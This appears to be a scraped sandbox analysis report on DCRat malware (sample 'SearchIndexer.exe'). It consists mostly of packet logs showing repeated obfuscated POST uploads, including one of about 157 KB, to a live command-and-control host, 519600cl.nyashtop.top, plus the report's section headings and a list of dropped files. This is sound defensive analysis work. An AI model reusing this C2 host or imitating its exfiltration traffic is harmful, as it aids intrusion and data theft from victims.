Jan 13, 2025 13:10:57.756861925 CET	3708	OUT	Data Raw: 02 55 2d 0b 30 33 5a 40 38 32 58 3b 34 06 0b 2d 0b 3b 09 57 20 16 22 3a 05 3f 21 2a 32 5c 22 25 37 3e 13 28 3c 03 0a 24 0c 58 00 08 33 55 3e 1f 3d 32 23 1a 3b 2c 3b 37 29 2e 07 16 36 00 26 17 03 5c 2e 02 24 2e 26 25 0d 10 07 5a 3e 0c 3f 0d 3e 0b Data Ascii: U-03Z@82X;4-;W ":?!2\"%7>(<$X3U>=2#;,;7).6&\.$.&%Z>?>'%+&%0.):5X0[=([2&^7'C1(S$8>5\:-,8=T_&_1$4895"8??,6/0?#!<2503V12:/>0&+Y)0&?<6;!)(=)S4)!"?]R-Z +2;%=6_1Y']P*01'7;
Jan 13, 2025 13:10:57.756879091 CET	3708	OUT	Data Raw: 39 5e 1e 1b 08 3b 02 36 2e 24 55 1b 3a 20 2d 28 3c 30 24 1c 31 26 34 2b 3d 2b 07 3c 08 3e 27 12 32 3b 5c 26 3d 56 0f 04 3f 17 30 5e 0d 0e 3c 15 37 39 38 36 3b 3f 32 5b 34 29 2f 29 06 3b 17 5d 32 01 5b 31 08 27 33 11 38 2f 0b 1d 24 34 3e 52 3e 1c Data Ascii: 9^;6.$U: -(<0$1&4+=+<>'2;\&=V?0^<7986;?2[4)/);]2[1'38/$4>R>T/5Y(<;#3Y$+!2U8P,)>0 Z>%Z) 4U)X05<=T<)??T&^[4-1 ?(47:+*-23C!>U^3326?),)9-)[=-!:< ;:XS++0"[)=%_78!
Jan 13, 2025 13:10:57.756896973 CET	2472	OUT	Data Raw: 01 2d 25 5d 3e 31 31 3f 35 0c 35 1a 30 0d 35 3a 3e 57 3b 02 05 2a 21 0b 3b 34 09 25 24 39 00 23 03 0a 17 07 0a 5d 18 08 33 03 31 21 20 5e 16 27 0e 3c 0b 1b 33 33 25 57 39 23 28 26 3b 3d 3f 3c 02 3e 51 51 21 33 0f 00 35 2a 22 0d 30 3f 3a 1e 0a 07 Data Ascii: -%]>11?5505:>W;!;4%$9#]31! ^'<33%W9#(&;=?<>QQ!35"0?:T=W%>)0:#7:"?28WR(75#(\7@35!^X&_8Z4&X:0W6^06<</1S?9Y2(3:25(?@<^2&+Z\> 6Y-=\2$\#.).2>75X[*;:=4?'"]
Jan 13, 2025 13:10:57.761761904 CET	2472	OUT	Data Raw: 30 54 2d 28 30 17 2c 59 27 0e 37 07 33 06 57 1b 09 2c 3d 58 3d 37 23 20 3a 5f 26 00 3d 2c 2c 2c 39 35 20 13 07 3e 35 2d 3b 3a 32 28 34 1a 1f 55 3c 28 54 1f 2d 5a 2d 23 2c 2e 30 5c 36 31 2c 5f 3e 02 1c 07 02 3d 3f 2b 12 37 3f 38 31 0b 2f 08 3f 3a Data Ascii: 0T-(0,Y'73W,=X=7# :_&=,,,95 >5-;:2(4U<(T-Z-#,.0\61,_>=?+7?81/?:+#"+7-D?[/Z"U5$!#?-+(2884+21]=5?_>+S!83R0>S#G#[#2Y>392>.>I109>-93&%<Y#5TSYT#=\*4,2&)"("-5$5;95&>7X5/52^(026&=3> C59
Jan 13, 2025 13:10:57.761791945 CET	2472	OUT	Data Raw: 3a 58 5e 3a 25 33 37 16 3c 32 2e 00 38 3d 09 2e 2d 1c 34 38 30 22 3c 3a 14 02 08 2d 2b 00 0e 5e 0e 3a 18 28 33 2d 31 09 26 36 3d 2c 34 06 23 32 3c 42 3b 2e 35 34 3b 38 3f 03 30 3c 3b 2f 3e 23 3d 56 03 3f 31 56 38 37 00 5c 5f 29 30 29 5a 31 3d 06 Data Ascii: :X^:%37<2.8=.-480"<:-+^:(3-1&6=,4#2<B;.54;8?0<;/>#=V?1V87\_)0)Z1=5#' +Y^0**_Q)99$%X88A89,'PW5>>.2-5'6 X"2&5ZT.<]/3'4%P2/, _==?12?1S/[+_=/']+ $+2%%.4.?_ ,?-S>2=Q2W ##4>>&
Jan 13, 2025 13:10:57.761806965 CET	4944	OUT	Data Raw: 39 37 37 1c 06 58 53 24 31 12 18 23 3d 13 07 25 35 55 29 28 0b 33 29 3d 0c 0c 01 0e 02 2a 0f 15 27 34 01 25 28 39 00 05 36 56 2d 5d 3b 06 0c 27 34 12 32 1d 26 04 24 04 3b 07 00 35 31 31 0c 35 39 2c 1a 01 3c 01 0a 5f 31 06 00 23 0f 06 3d 2c 29 26 Data Ascii: 977XS$1#=%5U)(3)='4%(96V-];'42&$;51159,<_1#=,)&2<9Y-SZ15=02#<8?$&<]1=9(V:%(B.^#(>":#W-W<47\?9&S-6^/S.!^091$ 4%5[9C\(-):>[?<_11?T31,3]/3Z2,,!;2"
Jan 13, 2025 13:10:57.761866093 CET	2472	OUT	Data Raw: 05 5d 32 3d 0e 2f 26 29 24 3f 2d 5a 3e 23 28 54 0c 0a 36 1a 0b 32 2b 56 37 33 0d 5c 30 22 06 05 11 37 2e 07 2b 2d 16 19 3e 5d 22 38 33 56 0f 39 3c 26 0f 32 3e 2a 01 10 3d 37 33 04 0e 38 2f 3b 25 28 24 5c 03 0c 0b 5a 3d 30 03 01 0f 56 1e 20 29 2b Data Ascii: ]2=/&)$?-Z>#(T62+V73\0"7.+->]"83V9<&2>=738/;%($\Z=0V )+^4?/_'338\ <-?^-]6?.<=\69:Y C0>4!)6"^S3-=0\$3.)"Y0+7>7)A);0+(%',?1*?,=_21>:T'2^9\T;]>92BXR" ^^>> \P<
Jan 13, 2025 13:10:58.031088114 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:10:58.300348043 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:10:58.745654106 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:10:57.420599937 CET	285	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:10:57.767628908 CET	2580	OUT	Data Raw: 5a 5c 5b 56 54 43 51 54 5a 5d 56 56 52 5e 50 5c 50 5f 55 58 57 55 5a 5a 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: Z\[VTCQTZ]VVR^P\P_UXWUZZT[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\ . :5.\%/):3$'>)$R$!1+9_$W7+>'F!.\9
Jan 13, 2025 13:10:58.298288107 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:10:58.300400019 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ
Jan 13, 2025 13:10:58.300472021 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:10:58.481509924 CET	261	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue
Jan 13, 2025 13:10:58.829591990 CET	2580	OUT	Data Raw: 5f 59 5b 5f 54 48 51 57 5a 5d 56 56 52 51 50 53 50 5e 55 58 57 56 5a 5a 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: _Y[_THQWZ]VVRQPSP^UXWVZZT[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\ 8& !%$ (+X'(9'/+'T"Z(_''1(Z<'F!.\*
Jan 13, 2025 13:10:59.131508112 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:10:59.269674063 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:10:59.435622931 CET	261	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue
Jan 13, 2025 13:10:59.783382893 CET	2580	OUT	Data Raw: 5a 5f 5e 51 54 44 54 57 5a 5d 56 56 52 5f 50 59 50 5e 55 5c 57 5f 5a 5a 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: Z_^QTDTWZ]VVR_PYP^U\W_ZZT[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#\85\!:279?_'(-$/)8'")<;$?'F!.\*
Jan 13, 2025 13:11:00.074445009 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:00.203423977 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:10:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SearchIndexer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Au3Check.exe

C:\Program Files (x86)\AutoIt3\Au3Info.exe

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

Windows Analysis Report
SearchIndexer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:11:00.382977962 CET	285	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:11:00.735975981 CET	2580	OUT	Data Raw: 5f 5d 5e 51 54 45 54 53 5a 5d 56 56 52 5d 50 58 50 5d 55 54 57 57 5a 59 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: _]^QTETSZ]VVR]PXP]UTWWZYT[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#^;3> 2:^%4+_$+93;= 3")(0X$W7).'F!.\5
Jan 13, 2025 13:11:01.031017065 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:01.161417007 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:11:01.414022923 CET	285	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 1904 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:11:01.770657063 CET	1904	OUT	Data Raw: 5f 5a 5b 57 51 43 54 55 5a 5d 56 56 52 51 50 5b 50 5a 55 5a 57 5f 5a 59 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: _Z[WQCTUZ]VVRQP[PZUZW_ZYT[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#,9!2]%?)3%8$(S\,'1:X))3&1$_(.'F!.\*
Jan 13, 2025 13:11:02.054920912 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:02.184114933 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 21 56 3d 1b 0c 1d 33 3a 3c 52 3b 2c 25 03 3a 3f 2f 5f 2a 0c 2b 05 3e 04 13 5c 3a 10 30 58 2b 2b 2c 5b 29 22 2f 0e 24 0f 2b 0d 3e 39 2b 51 07 11 39 1b 24 3d 2d 07 3f 55 2a 13 24 54 3a 42 35 0a 27 06 28 07 32 57 33 16 23 0c 3c 2b 3e 04 29 33 00 59 25 07 0f 0b 2b 3c 25 07 3e 3d 2f 5e 08 12 25 56 29 22 32 0f 24 23 23 1f 22 2c 24 5e 2a 2f 25 16 22 11 00 55 29 04 3e 01 27 00 25 13 26 3e 07 05 25 0c 3c 1e 31 32 21 10 24 03 24 50 2f 0f 2c 51 0c 3d 5a 57 Data Ascii: !V=3:<R;,%:?/_+>\:0X++,[)"/$+>9+Q9$=-?U$T:B5'(2W3#<+>)3Y%+<%>=/^%V)"2$##",$^*/%"U)>'%&>%<12!$$P/,Q=ZW

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:11:01.635178089 CET	285	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2568 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:11:01.985954046 CET	2568	OUT	Data Raw: 5a 5a 5b 5f 54 43 51 54 5a 5d 56 56 52 58 50 5a 50 50 55 59 57 56 5a 5a 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: ZZ[_TCQTZ]VVRXPZPPUYWVZZT[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#[;!"&13)?_$!0>,S:/$:Z(/0;(>'F!.\
Jan 13, 2025 13:11:02.282390118 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:02.411541939 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ
Jan 13, 2025 13:11:02.422107935 CET	298	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IrmqyKZIOWMKVSdnVClksD11m5zJeoQlfD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 156954 Expect: 100-continue
Jan 13, 2025 13:11:02.620119095 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:02.620542049 CET	14832	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 72 6d 71 79 4b 5a 49 4f 57 4d 4b 56 53 64 6e 56 43 6c 6b 73 44 31 31 6d 35 7a 4a 65 6f 51 6c 66 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------IrmqyKZIOWMKVSdnVClksD11m5zJeoQlfDContent-Disposition: form-data; name="0"Content-Type: text/plainZZ[WT@TPZ]VVR^PSPYU\WSZ]T[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^X
Jan 13, 2025 13:11:02.625734091 CET	2472	OUT	Data Raw: 64 6a 46 6d 55 57 68 30 64 46 52 6b 56 7a 42 54 57 6e 52 5a 4f 47 35 55 63 6c 4e 58 65 6d 46 6d 55 7a 6c 7a 62 30 31 69 65 48 4e 32 62 56 4e 5a 51 32 78 49 65 56 46 36 4e 58 70 31 54 7a 64 48 54 57 6c 73 4d 48 5a 58 55 7a 4e 6f 5a 56 42 55 63 6b Data Ascii: djFmUWh0dFRkVzBTWnRZOG5UclNXemFmUzlzb01ieHN2bVNZQ2xIeVF6NXp1TzdHTWlsMHZXUzNoZVBUck9TeHQ4TGNMZFFYSXVsa21acEdaWkUySHltTzBxQVpBQ3BYMHhWd3d4TWNtTkNmZFJSNVVlYytXbi9mSXFubFVYSlBtMkkvdHVmSzF5TFczNEZXMnZZYlMydFlacjZ5ZzhuVTN1TGlLYXphV1dTRXh4cmlGeEdmTGM
Jan 13, 2025 13:11:02.625787973 CET	7416	OUT	Data Raw: 56 44 64 6a 4d 58 56 70 53 30 35 55 61 30 6c 76 55 48 4e 4c 55 45 74 71 65 6d 35 35 4d 48 6f 76 64 57 6c 7a 57 47 73 34 53 45 63 7a 54 69 39 57 63 6d 5a 72 59 6e 68 36 4d 6d 39 77 4f 44 5a 71 4c 31 59 33 4c 32 31 56 53 6b 78 31 4d 6d 63 72 65 57 Data Ascii: VDdjMXVpS05Ua0lvUHNLUEtqem55MHovdWlzWGs4SEczTi9WcmZrYnh6Mm9wODZqL1Y3L21VSkx1MmcreW03dW85VnZITTF2YzM5bEE2Uy9abmhNZVpDNnA1a2dMWkJPZUFRVzVHQ3cvc3pSTlMwNTExU3dtQ1IzRWZucmJUTXFib1hWUzZ0SGtnc3k4QldIWFB2b0NORjZJb3oxd0tiNUVYL1BKUCsrUlZMSzBsSktXNnQ4aUh
Jan 13, 2025 13:11:02.625847101 CET	2472	OUT	Data Raw: 5a 55 70 4d 65 54 5a 6e 54 6e 68 68 62 33 6c 58 5a 48 41 31 62 7a 68 35 55 31 46 71 52 32 52 31 59 7a 51 31 65 43 74 4b 55 47 46 7a 4d 6a 64 30 64 6e 52 56 55 56 52 6b 64 48 64 6a 4e 58 68 74 64 48 5a 33 4e 54 68 50 55 43 74 46 5a 7a 41 72 55 7a Data Ascii: ZUpMeTZnTnhhb3lXZHA1bzh5U1FqR2R1YzQ1eCtKUGFzMjd0dnRVUVRkdHdjNXhtdHZ3NThPUCtFZzArUzYvdFg3UHNtTVczN1B1emdBNXp1SHJYeXVjNGVvcTN0cmU3b3ZtZTVsTGNueTAxZVMxLzRKVzhiUzZmcmR2WStJN1M2Z0Z6Y29JN3kwODBlWWpxTWJ0dWM0NHgrUjcxcStGTEZ0UStIc3NTNkYvYkpHcWx2cy8ydjd
Jan 13, 2025 13:11:02.625895023 CET	2472	OUT	Data Raw: 64 44 4e 4a 56 47 64 49 61 7a 51 30 4e 45 6c 51 55 46 6b 78 51 32 67 34 65 47 39 73 55 6b 68 61 63 47 77 7a 55 6b 46 4a 59 33 56 50 5a 56 59 35 55 6e 64 6c 62 6d 39 68 4e 48 4e 51 61 48 4e 4f 61 44 5a 7a 4e 6d 78 4c 65 54 56 79 57 46 68 55 55 79 Data Ascii: dDNJVGdIazQ0NElQUFkxQ2g4eG9sUkhacGwzUkFJY3VPZVY5Undlbm9hNHNQaHNOaDZzNmxLeTVyWFhUUy8rWjJZaXZpcTlPRk9xbStXOW5aMzF0L2tGRk9pamx1TGFXNWdnbmx0NHMrWkxIRXpJbUJrNUlHQng2MHhzb3pxeU9ySXBabEtIS2dESkpHTWdZNStsZG50SVh0ZEhKN0twWlBsZXZrTFJVbHpiM05uNWYydTF1TFl
Jan 13, 2025 13:11:02.625907898 CET	2472	OUT	Data Raw: 56 57 34 31 56 57 5a 58 61 6e 42 52 54 56 52 49 4e 57 55 78 51 6a 51 72 62 45 74 53 4c 7a 68 42 63 6e 42 44 54 55 68 30 55 55 46 75 64 43 39 4c 62 47 38 33 56 55 56 49 52 6b 6c 4d 62 6d 55 77 56 56 56 57 51 6a 68 7a 55 6c 52 36 56 46 64 73 61 6d Data Ascii: VW41VWZXanBRTVRINWUxQjQrbEtSLzhBcnBDTUh0UUFudC9LbG83VUVIRklMbmUwVVVWQjhzUlR6VFdsamVYc09vMituVG9GdDdXZTRXVmw4MXpsc2VXakhoRllkUDRoVU55c3F2ckEwN1RUclFkcmVlMmhpYVJGRnZOdUx5QURhMkVZYk1uQVhxd3FTZlRvcFl4ZnpRYm9sbEVQbUhHQStNNDllbFZIMExUNUdMR0FBbnFSWGs
Jan 13, 2025 13:11:02.625921965 CET	2472	OUT	Data Raw: 64 54 5a 7a 62 30 78 34 55 58 4d 32 59 6d 64 45 61 31 5a 46 64 57 73 79 55 30 56 72 55 57 70 4b 52 30 74 6c 53 58 6b 79 56 6c 64 7a 4e 58 46 57 61 7a 64 6d 4d 54 67 33 54 44 64 70 54 55 70 74 4f 45 74 47 51 6c 55 7a 52 7a 64 57 4c 79 74 43 4f 54 Data Ascii: dTZzb0x4UXM2YmdEa1ZFdWsyU0VrUWpKR0tlSXkyVldzNXFWazdmMTg3TDdpTUptOEtGQlUzRzdWLytCOTEyWjJvV09xYVg0YzFPMjFLQzR0WnJyVVloYnJJdURLcUxLWFpmN3lqY3Z6REk1SE5TNmtsL2JwcWw5dG1TMmJ3OVkyME03cmlOcHo5bklRRThGc0FrajB5VHhWcUhTTE9COTZSOCs5TWJRckJuTEdMazllYXhlVTF
Jan 13, 2025 13:11:02.625967026 CET	4944	OUT	Data Raw: 64 45 70 53 55 6c 46 42 56 56 56 56 56 57 64 46 62 32 39 76 63 47 64 47 53 6c 4d 77 56 55 52 46 62 33 42 55 55 31 56 42 53 6c 4e 70 61 57 6c 74 51 57 78 47 51 6d 39 76 52 30 70 53 55 32 31 72 62 30 4a 43 55 7a 56 77 53 30 74 5a 65 48 64 6a 4c 31 Data Ascii: dEpSUlFBVVVVVWdFb29vcGdGSlMwVURFb3BUU1VBSlNpaWltQWxGQm9vR0pSU21rb0JCUzVwS0tZeHdjL1dqS25xdjVVMmlnQmZMVS9kYjg2WVltSGI4cWRtbERFVVdEVWlJUGZpa3FmZm5xQWFRcWg5cVZoOHhEaWtxVXhmM1NEVENyRHFEUllkeHRGRkZGaWhLS0tLQUVvcGFTbU1RMFV0RklCTVVsTFJRTWJpZzB0RkFDVVV
Jan 13, 2025 13:11:02.626029968 CET	4944	OUT	Data Raw: 56 6d 6c 44 54 7a 52 78 57 46 59 76 52 56 59 31 59 58 63 79 63 32 4e 4d 59 6b 4a 4a 63 44 4e 35 5a 32 4e 72 5a 7a 6c 43 4e 6d 52 71 4b 30 35 50 5a 7a 68 4b 4b 30 6b 30 65 48 4e 6d 55 7a 56 36 64 45 39 42 4d 30 68 4a 4c 30 39 78 54 6a 6c 69 54 58 Data Ascii: VmlDTzRxWFYvRVY1YXcyc2NMYkJJcDN5Z2NrZzlCNmRqK05PZzhKK0k0eHNmUzV6dE9BM0hJL09xTjliTXBrc2I2SXE2SGxjL01qZjQxK1lVc05TdzJMalZydzVvcCtxL3dBbjNQNkV4U3BZNmkxaHBweXRmZlg1OVVWNU5UbHVnR25uZVVnY0YySnhVL2gyNlllSmJZb2ZsQWZmOU5wL3Jpc24reVp3MkV1RUtlcHlEV3hwTnR
Jan 13, 2025 13:11:03.493463039 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ
Jan 13, 2025 13:11:03.711143970 CET	261	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue
Jan 13, 2025 13:11:03.900099039 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:04.456947088 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:11:01.661976099 CET	284	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 540 Expect: 100-continue Connection: Keep-Alive
